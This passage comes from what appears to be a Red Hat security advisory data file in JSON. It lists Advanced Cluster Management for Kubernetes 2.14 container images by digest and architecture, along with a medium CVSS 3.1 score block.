"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a1896f5f7d19945fe045b3f148c1802fa05bf6cb2d029d57a6ad618984f9b213_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:f7bd358a85922350de6f9f4dbf91a473ca51f245f2ddbc941388bc94fb05d33e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:370c2024529902a32cb9e82d3dc793a0e5ac9de8a5345e58674078074f7222a6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:45b898ff7eb7b5a298577ca16829e9554f179a25609e72874a8fde9ef0d892fd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:82f99122cfc73a9f43ab1f03ffb819bf8a0eccfa07bfebb145fdb883a36f03de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bf8857a8967922ece490e8fcde410c3efb21ebaac48a4346011ded390d763170_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:6e91b713e6d6b965b9bb5e5ba5ae37a487fe73fb18b59e7f2b8ee89ebe52f212_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:80f8f269b175dfbecc4c21c39b6385e4fc0939a0e5297e580213412f558ac583_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b7c83aef590284b867aa6050b5c206a7b81a2a2dfad8477cbc3b143e368c3636_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:e4d4a45a7bb882f5d60acde0cdd2bb6e092ba50dc709b484a513d1399bef18d4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:28072f029e61aa7fdfef70a767f5c809775dddaef337d6bfe48ec25f7839a184_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:2b5b2a26f35f6ebd7bc921ceecbdb16c55d1e03337c74a9d2e271be4635066ee_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:3b667400920c96bb5f69c9a8d0510993c084ba6604d43be233d217c83f6a2e67_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:865e35a99ab1efd55b6cec986cc170859baf895306bf86c730f818f51b548b39_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:0016866635c4b9a24072275ec416ecc38df049edcea177611a12d1aef4394b43_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e41d647fc468bb3f44bad88b4656b33e557427beb0191b0fcdc5f1f0df66c07b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e77b6c7a0890213bcdff276d240e9e6ac773f90dc6b4b1626dfc4c70fceb846c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e9821e27e4187c6fafec0bc3cfb5f5e534faa5c5afdd82cad9869d54d9dcf855_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:231f3779db0ac8489f4d0333b176b2dff83eda3778573e1f990eafcf18317bd6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:99faf43dc00f23f4cb981423d25b66848ddae927912f99078cc567afeb2a7191_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:abe767acb1f0f6cc625fbe63a6a4c00b0eef58642ec55d2e107bf0f90f9e1274_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:f70d80b998b2b03c91f59b77a315e82737c304ffe174f5d1839dd28c2ec01bed_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7093e9c5c223922accfd344ad2bba34c763eab82b35669cf175a3333b2b4e445_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b646fa5444f28c01365df32d019e0f57872b450597ae2bb6993e86014d1a7548_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b7bfd21a3a383f631488e0cc979ea9969dc3cd6f2db10960f524e37b058dfd5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:f8b6b891e5a948fc03983b2f40bee3eb312e5bef80b2a35fc502d28ed96e1c93_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:05847c2e995e681bdcc3f809e76f512767f40ac4498c14fad4afb4cae83f33d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:4f03df7f0ee87ce88f225e193f03e6471e26808e8a5224bd75828740cf5e42b4_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:844cb73f99650653f57b64fa478ae4d0b207cd60040cdbd743bca7fd76af30ea_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:8f220b523bebe0d150987f34090005f500af558f0659808d4bee974fbb48dd42_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:1399e0cd77802ef77f4ca5c80e2173516420755581c886949cc5f5bd7473f38b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:4e0e3c4f0fc0cc13d9780487ccf9a1315ff0e867c003cb5a9c919d2b20bd3e58_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:7f45bf6cfb2eefd9107b76524fd83883f389eda8f69f1f2ee55b56542283d9b4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:911c05cb845692bb81e2749b73fd9fd6826771cb4b5ac6ad119a8f3fcfb650ba_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6b34944da4fcf630306c6bef503b659b7ed578faf0f5b5e3c0bf2938b1f18247_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:76350af87e31aaa6521d99ee32fefa7792de71d25ade270646f9cbc2332d3725_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:bf7eee7477d52688df5520c2053aa294ae9c4baf4c0c885a0d5ba5a4c7c790c3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:d8eaa77004ccaa78036830fd5872dd2da30ca3ffc0b468b587b7561630640b9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:0ee74288b19b217b917a4719d08bd1ddead9fdc90bac9f9868b8d721e12a8576_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:69517bbf832177af9b8ce276032625b935f3939afbfa05a01bafbe5252416892_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:78b26db7d7a4ba4d63f0d466ee0a4588c5606f64d6617585efbe363903cc2bff_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:feffbb2c5cd8b8edb0944e5d1c49bb49aeb902bb6f44343a7e882c060efaa108_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:492e4517ce3576fb77dac831c7bc0ad56914646feed30858918b5e86b00ba71e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5e1fd4942feef5acc27fbc5fc0ca43956a68c718768bbcc5bf3589cb2dfc389a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:9902b0f5c4d507d881314c621a14aa922c473cad40e5ad0a3b98c47540006fef_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f534b88cb3db85b58b6f48ef64c433c673d422bf41d09fd303ffb5d7091a3b34_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:182c0d1f98ca9809ff1e31387bc19c9a110dba2d49538cc2acae18bb4910c902_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:280faedc5f26616bd0614c1f20851d3642ee134e66e1da57cac81484a48cee11_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:99f4559ba7f6f1669d774032e080727ab72a3fc85846058e6938266220938e73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:e0465a23af03dcd988bd1aa45161cfd67bb175105766ac425eba9d0bcdabec8d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:11028e9f630af725dceed505e101d54b75ba978cb14607f9940af75f867aa639_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:528d1a9167e0c4b2c5f2dcffe9a96970a92a3df134b76eb4fbeaa5b9cba9f3f1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:66774f0dd04cd3f3f8939e60cc89c98f2a9082f3617999d1c2a3e46ae461f7e7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:f1293017bb56a08f22a0ecd3785e8fea7c6dd9592583fabebbc4c6c3a1ed2cd5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:6ce4f2f4e95e49e027d38d76e00e6ab05481389a2f1d7646f0741ca371a93869_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71a403581e9fb13da9679af97d53daea1efa06142c503b659a07e7ddda0c39cd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:91c016b3065808ddbceea1d6358a3a6c79480e41cdfe98e0f210af9dedb7a4ca_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:add985bc8ec3f3d6d57266ed76509e0f9b7df16bf3cb698a60f9929ae441d50f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:646a6afc52c83362e32549a0ec09ff4d0677a239ec2b58a82e4374ee3b38053b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7566bd3c569a92b3540e44a31ef49e7dc9934254d457ec1e36d97824a1b7c82c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7fdb6e7d3859f06c4e6685853ae34f74f99daac5ba70ae2c3692bc7202a12c8c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:fdd3dc61d0214588fdfdc0260cd75c395e02615bc73633d84184dee02effe404_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:47b07ed00366723b4063957769aaefc49b4bbcd4bcf14bf675b653db5a10ab01_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:9726ba85bc1d7ec79758e46d6f28ae8ecacd6d1be21c56af9b795aa15bd07f7e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:c0ce3946e9aa446e8b8edca27e489ddd2dd7cf997da4951dce7d8be153ab5a08_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fe2a087063e5f7fb0b140e4b6b7631df3c6052e9c36659068a48631da4781a88_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:08070208d69530bb849be1ac083d9f1affb1363232a2f589e839c09148c7bec0_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:5f225c8b7cec9c965cdfefdfcc34371b1dbd3a39d1e6a74f121ef9feffcb4f11_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b4cd50768238d29e719a60e98dba61d24ba70dd9d04d7410536ee629ec62c4fe_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:c04d51be3f48aff9d8741b0e4be39497d89265b85f029487ab52440efe0f28f7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1740b9e687e829ddc242fa400cf496ce94bdd875de8e9a83589f540231770016_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ba7ccd4485603b4ec39569b8e87122de610a6775f022f53e1150db0dbdbe2bcf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:d47624803ffd462eacd0454c07ba5f000cd1e0e6658c595b936eca5441f49a1e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:f87d0e73a50771c6ae322ba9aefc826a87910e3ffc64473a98ce197a30bd2647_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:0fcfb11a3e8fd162b15b81bb5133549e8f21139ade68e4a66f0d1f216edc09bc_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:74a11d641af79fe69be111135609e0d22562fd01ef95343c133d1a2ee527079a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:86392c4f03ba2eec91ccbc75a0679f91e38cbd1ccf3aa55e6f942d664a254213_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:94b9d0a6720165c916fdb14a4f891f22861e95544e13d2ff706a4547c60e207a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5559d75fc24f1251b934563e4e98090df535dbfb0218a8f4135e8ecb6c4544a0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:738a4ebc0b24bdb00ac386ecffaa74c9cf71fd5cd3023671509899ba481c09d4_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:96cf5d8b47c5c6c30ed4ca119f02b6e8df2952788db6508663618cf779ebe00a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:fee7a4ef5d73d6e81e0b913a0c15ed8254f138ba8115fae8c3819a2cc6144fdc_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:241781caa54f27677f1494b8f55bbacef14751fe686f1410534a5d48de010679_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:4f6436c0a8aed6c7cdf9322c312e61f551365d6c2f7680765aa83ef19f21af8a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:84fec9caf52a3f3e7e1d946345c995c7db53f8797ac45921a2caf021e49b1d6a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:9aa65853e2ab9469cbce3dc8dd5b40c6a19f844c2f07eb2657639b56afdc6b3b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:857f48a392757a6fec8a26bddc7bccffa463c33c5824bf8a809784e5b06f9cb1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:be40e3b9e6f7e8ea857b906e82e8ffc713fbd9b3f4016711a8158f5054d951fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:e951334f9a85760ad85e96695e35ff045ea274ca0203a96ef7394d4905379325_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ea69db2fd8c7ce3e39af7997a83812dd97b7fec6fce3d6776ec652b81fd3b7cf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:86c711091d0a954427d4dcd667cee8feda6dbc6fa2616de9f3316750b04c27e7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:8d21a1ec53eff605f99f5a79162e7fcf5092a3c30bcbd21b23f0c7bd9bc5bdcf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:b74c9fb6ad13b57c47634acbd269fb53e937aba7dbbad45e50b9a6dc60dfa87c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:f15faa8241eb4808d2f4c7c07f1ff9e0036202665c35e3df983055fe7bc0885e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:3fd793aaa8b22670c9a863613bd20e1fbbd946b8a15bc684bb952364d98a0c28_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:5c3b02c97bc9d3383b69157f98c8e9091905973af181692a11caf414ca366331_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:719f5cfdb6fbac0903e350e7df9e983dbd4109a83055b335db3b7895353f64c0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eda1cbe6851aa6fb1921e11a8c608d22210a8f63c9fe145e8f5ae0eb585b6cce_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:2da0d50b3c91414f3e58dfacf6f47f8770790d16b70d55afb1d291533575ab85_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:b8854dbea48fdc080a446859dbf92cbe5cf3dbd25959a5c0608ebe3a8222b031_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:cfd3cf79f22ec65643a9637779ac200ca33784f9f558ea233de05597396fe65c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:dfc54b25aeb5826df80d9f98031bd2675065e25cb3ae8692871478cae5194973_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:45a3b742df7e286cbf840e32285b281803f9e97f579af9721f9f9ae00bd2c824_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:580a0307f5881f91950436573a17854ecd339045f60a88f5bd18adeecb5b0ca9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:607796d67b50b70e54520428d0b2a1e53b604dae9395ce7a011e57787562de89_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:b5445243950f037d7932cdfef65443df4558717a782712ea3dfa792bbc18891a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:08f1c3f4bbd371a46fdbd696026a9509053e4c091d591f8c92e32ed5590b432e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:47f7aa6cfb685cf9d533ef3b505ede5c614e2837513bfe3f68b76c3f650ca240_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d739b5a788d6888fb970f44d03869467731d8d03a34f271cebeb31e0e34edddd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d978057f781d3ef887909cab4211f892017e76de317f3d2f17cd6314ec883939_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:212e04293273e80955e59c3346933abc016ffa23c6072718b98b918ac07d6a1c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:505f4d5caff4451c781320044f2b01968fafa1a7b2c4734627f9778526c06494_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:b7aa114127474db733d9f4080d2770a48e13dc8971b483aec36d0227a7e2c22c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:e3d2d1e3d4467a8ee296180442f093643d07e2fe1f9c99b683ea69942d53c997_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:1b56fc6c4b897bb8a62b1fa176af6bace8282b2de38e3e69b5673c5ae3e6848c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:55dd4696828ab8a7546481b8124406d858b9a43563e14599d06f5e5b1ac030f5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:c13595e478ea28b6ba8d146d5a93c6f271babf253653d914139000e5af34d022_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:e780559caf89469f58e9d6646c389031a4cb080853aad7d471a5e7339c39f28c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:263dcdd063b32734cead282523078f3365e8ff793eabe18c95207316bf2dbf77_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:2d5dd95834e1cac3c33a22708c97fccd17e6a5891cfb9cf07d61caab399322df_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:9f7cc4bc6e4019ec9b9e9b72f469902e54befa09560c1d1a1928ab1de5716ce1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:dcdecabafdeba7adbf11f25eb4271dc69a7726216f52948bb26527ac5c1bab6f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:42122cf17900940fba0ba140e4983eb2ced2f0001792501b99523fd6b7960335_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:495c5326c40792227be26ef78244a0f72cbf3124c843a68cc07e724abac5b31e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:5ff93565951e58d1c3d181897f20efe5cbd1f0f902e050fc460b5dc91d4d1d82_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:76718e6fe4d575e6348dac6ebc9a892cc1dd7da3b762cbd8965bd339862e5541_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:3fda89fe951abce23fecf4c0c6ecedda9f3da6e7639acf4be4160ab329dfdded_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:60e15cb9653139f0f1675141486f5c5d79b4665a94416d589381fee7a0bbdc80_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b19fbb7547999ff5e4144eebf4f57e8c3d310ae8f4b901a47d80b098cccb30b2_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:f014d27ed18d8258823f81fa5795530720ac21b355283c966b44943f04ca2f37_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:246de6f5a2a64d0f625e3af6fcfba5000ce3d1f60bee7b996c8571f0dff4917c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2ed7d15730c178aad5f3d7838f347f540e3f710e414c78af82f0715d57b7a9f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:73f5e95e4c2f259920af40a8f28db82251735a6e2047da0feb9c91411c5f55d5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c069f2f718598344b42e8472887f075042bc75bc1dc52a1f1248b5558189ee9a_s390x",
